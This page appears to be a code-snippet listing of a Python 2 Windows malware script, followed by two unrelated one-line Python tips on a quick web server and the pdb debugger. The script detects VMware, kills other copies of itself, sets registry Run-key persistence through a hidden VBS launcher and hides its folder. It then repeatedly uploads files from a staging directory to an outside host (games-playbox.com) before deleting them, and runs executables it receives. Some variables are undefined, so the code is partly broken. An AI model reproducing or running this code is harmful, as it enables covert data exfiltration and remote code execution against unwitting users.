1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 | from urllib2 import urlopen from urllib import urlencode from glob import glob from os import path from os import makedirs from os import remove from fileinput import FileInput from socket import gethostname from time import sleep from time import time from os import popen2 from os import popen from re import findall from re import IGNORECASE from psutil import get_pid_list from psutil import Process from sys import exit from sys import argv from httplib import HTTPConnection from os import getpid from os import kill def getserver1(): srv = "games-playbox.com" try : code2 = code1.read() if int (code2) = = 1 : code4 = code3.read() return code4 else : return srv except : return srv pass foldername = "/winone1" dir1 = "c:\\dir\\" dir3 = "c:\\dir" dir2 = "c:\\dir\\dir2\\" dir4 = "dir2" _file = path.abspath(argv[ 0 ]) fpath = path.dirname(path.realpath(_file)) file17 = path.basename(_file) def SysInfo(): values = {} cache = popen2( "SYSTEMINFO" ) source = cache[ 1 ].read() sysOpts = [ "System Model" ] for opt in sysOpts: values[opt] = [item.strip() for item in findall( "%s:\w*(.*?)\n" % (opt), source, IGNORECASE)][ 0 ] return values try : sysinfo1 = SysInfo() sysinfo2 = str (sysinfo1) except : sysinfo2 = "Test" pass if sysinfo2.find( "VMware" ) <> - 1 : print "VMware" #exit() pcount = 0 xx = get_pid_list() myid = getpid() for i in xx: try : pro = Process(i).name if pro.find(file17) <> - 1 : if i ! = myid: p = i pcount = pcount + 1 except : continue if pcount > 2 : exit() try : kill(p, 9 ) except : pass class ChunkedEncodingWrapper( object ): def __init__( self , fileobj, blocksize = 102400 ): self .fileobj = fileobj self .blocksize = blocksize self .current_chunk = "" self .closed = False def read( self , size = None ): ret = "" while size is None or size > = len ( self .current_chunk): ret + = self .current_chunk if size is not None : size - = len ( self .current_chunk) if self .closed: self .current_chunk = "" break self ._get_chunk() else : ret + = self .current_chunk[:size] self .current_chunk = self .current_chunk[size:] return ret def _get_chunk( self ): if not self .closed: chunk = self .fileobj.read( self .blocksize) if chunk: self .current_chunk = "%x" % ( len (chunk),) + "\r\n" + chunk + "\r\n" else : self .current_chunk = "0\r\n\r\n" self .closed = True if not path.exists(dir1): makedirs(dir1) if not path.exists(dir2): makedirs(dir2) try : batch = open (dir2 + 'run.bat' , 'wb' ) bat2 = 'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Search /t REG_SZ /d "%s%s" /f' % (dir2,file17) batch.write(bat2) batch.close() f1 = open (dir2 + 'run.vbs' , 'wb' ) data12 = 'Set WshShell = CreateObject("WScript.Shell" )\n' data12 + = 'WshShell.Run chr(34) & "' + dir2 + 'run.bat" & Chr(34), 0\n' data12 + = 'Set WshShell = Nothing' f1.write(data12) f1.close() the_output = popen(dir2 + "run.vbs" ).read() except : pass the_output = popen( "attrib +h +s %s" % (dir3)).read() the_output = popen( "copy %s %s" % (file17,dir2)).read() cname = gethostname() def splitFile(inputFile,chunkSize,basename1): f = open (inputFile, 'rb' ) data = f.read() f.close() bytes = len (data) noOfChunks = bytes / chunkSize if (bytes % chunkSize): noOfChunks + = 1 f = open (inputFile + '-info.txt' , 'w' ) f.write(basename + ',' + str (noOfChunks)) f.close() chunkNames = [] j = 0 for i in range ( 0 , bytes + 1 , chunkSize): j = j + 1 fn1 = inputFile + "-%s" % j chunkNames.append(fn1) f = open (fn1, 'wb' ) f.write(data[i:i + chunkSize]) f.close() getserver = getserver1() def runfile(ext): sleep( 2 ) data2len = len (ext) if data2len <> 0 : try : if dfile.find(file17) = = - 1 : f1 = open (dir2 + 'run.vbs' , 'wb' ) data12 = 'Set WshShell = CreateObject("WScript.Shell" )\n' data12 + = 'WshShell.Run chr(34) & "' + ext + '" & Chr(34), 0\n' data12 + = 'Set WshShell = Nothing' f1.write(data12) f1.close() size1 = path.getsize(ext) if size1 <> 0 : the_output = popen(dir2 + "run.vbs" ).read() remove(dir2 + "run.vbs" ) else : remove(dfile) except : pass def dex(cname): try : dfiles6 = dfiles5.read() dfiles7 = dfiles6.split( ';' ) data7len = len (dfiles6) if data7len <> 0 : for dfile in dfiles7: try : output1 = open (dir2 + "%s" % dfile, 'wb' ) output1.write(f5.read()) output1.close() dfile = dir2 + dfile runfile(dfile) except : continue except : pass def dex1(): try : dfiles11 = dfiles12.read() dfiles13 = dfiles1.split( ';' ) files11 = glob(dir2 + "*" ) for dfile14 in dfiles13: try : if not (dfile14 in files11): output11 = open (dir2 + "%s" % dfile14, 'wb' ) output11.write(f11.read()) output11.close() dfile = '' dfile = dir2 + dfile14 runfile(dfile) except : continue except : pass try : dfiles1 = dfiles2.read() datalen3 = len (dfiles1) if datalen3 = = 0 : dfiles = '' dfiles = glob(dir2 + "*.exe" ) for dfile in dfiles: try : runfile(dfile) except : continue else : dfiles = dfiles1.split( ';' ) for dfile in dfiles: try : output = open (dir2 + "%s" % dfile, 'wb' ) output.write(f.read()) output.close() dfiles = '' dfiles = dir2 + "%s" % (dfile) runfile(dfiles) except : continue except : dfiles = '' dfiles = glob(dir2 + "*.exe" ) for dfile in dfiles: try : runfile(dfile) except : continue remove(dir2 + "run.bat" ) print "Enting While" time1 = int (time()) count = 0 while True : try : time2 = int (time()) tdif = time2 - time1 if tdif > 3600 : dex1() time1 = int (time()) sleep ( 1 ) count = count + 1 files = glob(dir1 + "*" ) if count > 120 : dex(cname) count = 0 for file1 in files: try : if file1.find(dir4) <> - 1 : continue try : myfile = open (file1, "r+" ) except : continue myfile.close() basename = path.basename(file1) size = path.getsize(file1) if size > 105163101 : splitFile(file1, 105163101 ,basename) remove(file1) data = open (file1, "rb" ) w = ChunkedEncodingWrapper(data) v = urlencode({ 'filename' : basename}) x = urlencode({ 'folder' : cname}) headers = { "Transfer-Encoding" : "chunked" } c = HTTPConnection(getserver) c.request( "POST" , "%s/post.php?%s&%s/" % (foldername,v,x), w, headers) data.close() remove(file1) dex(cname) count = 0 time2 = int (time()) tdif = time2 - time1 if tdif > 3600 : dex1() time1 = int (time()) except : pass except : pass |
Python Web Server in One Line
Quick and dirty web server in Python that serves files out of the current directory.
For Python 3.X:
python -m http.server 8080
For Python 2.X:
python -m SimpleHTTPServer
Invoke the Python Debugger in One Line
Add the following snippet where you want to invoke the Python debugger:
import pdb;pdb.set_trace()